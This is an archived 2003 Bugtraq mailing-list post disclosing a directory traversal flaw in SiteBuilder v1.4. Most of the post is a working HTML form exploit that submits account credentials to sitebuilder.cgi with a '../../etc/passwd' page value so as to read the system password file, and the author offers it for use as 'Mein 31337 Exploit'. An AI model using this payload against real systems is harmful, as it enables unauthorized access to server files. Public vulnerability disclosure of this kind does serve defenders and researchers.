lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030831145446.18897.qmail@sf-www2-symnsj.securityfocus.com> Date: 31 Aug 2003 14:54:46 -0000 From: Zero_X www.lobnan.de Team <zero-x@...uxmail.org> To: bugtraq@...urityfocus.com Subject: Directory Traversal in SITEBUILDER - v1.4 Directory Traversal in SITEBUILDER - v1.4 With this Code you can view the /etc/passwd You need a Account. ################################################################### <html><body><p><center> <b>Mein 31337 Exploit :-P</b><br> <form action="http://targethost.com/cgi-bin/sbcgi/sitebuilder.cgi" method=POST> <input type="hidden" name="username" value="targetuser"> <input type="hidden" name="password" value="targetpassword"> <input type="hidden" name="selectedpage" value="../../../../../../../../../../etc/passwd"> <p><input type="submit" name="action" value="Yes - Use Advanced Editor"> <p><input type="submit" value="Return to Site Builder"> </form> </center></body></html> ################################################################### Zero X member of www.lobnan.de and www.lostkey.org